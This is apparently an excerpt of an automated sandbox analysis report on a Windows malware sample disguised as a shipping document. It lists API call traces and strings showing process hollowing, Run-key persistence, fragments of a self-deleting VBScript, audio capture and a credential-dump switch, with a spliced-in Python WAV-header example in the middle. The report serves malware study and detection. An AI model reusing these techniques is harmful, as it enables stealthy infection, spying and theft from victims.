                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                      • ResumeThread.KERNEL32(?), ref: 00417582
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                      • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                      • GetLastError.KERNEL32 ref: 004175C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                      • API String ID: 4188446516-3035715614
                                                      • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                      • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                      • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                      • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                      APIs
                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                      • ExitProcess.KERNEL32 ref: 0041151D
                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                      • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                        • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                      • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                      • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                      • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                        • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                        • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                        • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                      • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                        • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                      • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                      • API String ID: 4250697656-2665858469
                                                      • Opcode ID: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                      • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                      • Opcode Fuzzy Hash: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                      • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                      APIs
                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                        • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                        • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                      • ExitProcess.KERNEL32 ref: 0040C63E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                      • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                      • API String ID: 1861856835-3168347843
                                                      • Opcode ID: bc9ec409533e283fce2af8f1342da00a8cbb2ade10869ce45b4ee9a54c8ef04e
                                                      • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                      • Opcode Fuzzy Hash: bc9ec409533e283fce2af8f1342da00a8cbb2ade10869ce45b4ee9a54c8ef04e
                                                      • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                      APIs
                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                        • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                        • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                      • ExitProcess.KERNEL32 ref: 0040C287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                      • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                      • API String ID: 3797177996-1998216422
                                                      • Opcode ID: dffb05e8999f19a92d485080abe1753edacd729e18a2bd4646b419d6321fb820
                                                      • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                      • Opcode Fuzzy Hash: dffb05e8999f19a92d485080abe1753edacd729e18a2bd4646b419d6321fb820
                                                      • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                      APIs
                                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                      • SetEvent.KERNEL32 ref: 0041A38A
                                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                      • CloseHandle.KERNEL32 ref: 0041A3AB
                                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                      • API String ID: 738084811-1408154895
                                                      • Opcode ID: 67a24f6113aabf6128109dc61cf26ab2441941a35e225fe1c9d441213504bd5b
                                                      • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                      • Opcode Fuzzy Hash: 67a24f6113aabf6128109dc61cf26ab2441941a35e225fe1c9d441213504bd5b
                                                      • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                      • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                      • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                      • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Write$Create
                                                      • String ID: RIFF$WAVE$data$fmt
                                                      • API String ID: 1602526932-4212202414
                                                      • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                      • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                      • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                      • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
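Added example, not code from this report or from the sample: the thirteen WriteFile calls in the function above emit, in order, the fields of a 44-byte PCM RIFF/WAVE header (the 2- and 4-byte writes sourced from 00471B02, 00471B04 and 00471B0E sit at the nChannels, nSamplesPerSec and wBitsPerSample offsets of a WAVEFORMATEX structure). The Python below builds that header and parses and validates one from a captured file; the repair helper, which recomputes the two size fields from the real file length, is the example's own addition for recordings whose size fields do not match the file length, and it assumes the plain 16-byte PCM fmt chunk.

```python
import struct

WAVE_FORMAT_PCM = 1
# 44 bytes, little-endian, same field order as the WriteFile sequence in the report
HEADER_FMT = "<4sI4s4sIHHIIHH4sI"
HEADER_LEN = struct.calcsize(HEADER_FMT)


def build_wav_header(channels, sample_rate, bits_per_sample, data_len):
    """Return the 44-byte header for PCM audio of data_len bytes."""
    block_align = channels * bits_per_sample // 8          # nBlockAlign
    byte_rate = sample_rate * block_align                  # nAvgBytesPerSec
    return struct.pack(
        HEADER_FMT,
        b"RIFF", 36 + data_len,       # RIFF size = file length minus these first 8 bytes
        b"WAVE", b"fmt ", 16,         # PCM fmt chunk is 16 bytes long
        WAVE_FORMAT_PCM, channels, sample_rate, byte_rate, block_align, bits_per_sample,
        b"data", data_len,
    )


def looks_like_wav(blob):
    """Cheap magic check before parsing (RIFF at 0, WAVE at 8)."""
    return len(blob) >= HEADER_LEN and blob[:4] == b"RIFF" and blob[8:12] == b"WAVE"


def parse_wav_header(blob):
    """Decode the header and report whether its size fields agree with the real file length."""
    if not looks_like_wav(blob):
        raise ValueError("not a RIFF/WAVE file")
    (_, riff_size, _, fmt_id, fmt_size, tag, channels, sample_rate, byte_rate,
     block_align, bits, data_id, data_size) = struct.unpack(HEADER_FMT, blob[:HEADER_LEN])
    if fmt_id != b"fmt " or fmt_size != 16 or data_id != b"data":
        raise ValueError("unexpected chunk layout; only the plain 44-byte PCM header is handled")
    return {
        "format_tag": tag,
        "channels": channels,
        "sample_rate": sample_rate,
        "bits_per_sample": bits,
        "byte_rate": byte_rate,
        "block_align": block_align,
        "data_size": data_size,
        # internal consistency of the fmt chunk
        "fmt_consistent": block_align == channels * bits // 8 and byte_rate == sample_rate * block_align,
        # do the two size fields describe this file as it exists on disk?
        "sizes_match_file": riff_size == len(blob) - 8 and data_size == len(blob) - HEADER_LEN,
        "duration_s": (len(blob) - HEADER_LEN) / byte_rate if byte_rate else 0.0,
    }


def repair_sizes(blob):
    """Rewrite the RIFF and data size fields from the real file length (example's own helper,
    for captures whose header sizes were never updated)."""
    parse_wav_header(blob)  # validate layout before touching anything
    data_len = len(blob) - HEADER_LEN
    return (blob[:4] + struct.pack("<I", 36 + data_len) + blob[8:40]
            + struct.pack("<I", data_len) + blob[HEADER_LEN:])


if __name__ == "__main__":
    # constructed input: one second of silent 8 kHz 16-bit mono audio
    sample = build_wav_header(1, 8000, 16, 16000) + b"\x00" * 16000
    print(parse_wav_header(sample))
```

For triage of a recording recovered from a host, run parse_wav_header over the file: a false sizes_match_file with a true fmt_consistent is the signature of a capture that was cut off, and repair_sizes yields a file that standard audio tools will open.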
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000001,004068B2,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                      • API String ID: 1646373207-2324880036
                                                      • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                      • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                      • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                      • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                      APIs
                                                      • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                      • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                      • lstrlenW.KERNEL32(?), ref: 0041B207
                                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                      • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                      • _wcslen.LIBCMT ref: 0041B2DB
                                                      • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                      • GetLastError.KERNEL32 ref: 0041B313
                                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                      • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                      • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                      • GetLastError.KERNEL32 ref: 0041B370
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                      • String ID: ?
                                                      • API String ID: 3941738427-1684325040
                                                      • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                      • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                      • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                      • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable$_wcschr
                                                      • String ID:
                                                      • API String ID: 3899193279-0
                                                      • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                      • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                      • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                      • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                        • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                      • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                      • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                      • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                      • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                      • Sleep.KERNEL32(00000064), ref: 00412060
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                      • String ID: /stext "$HDG$HDG$>G$>G
                                                      • API String ID: 1223786279-3931108886
                                                      • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                      • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                      • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                      • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                      • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                      • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
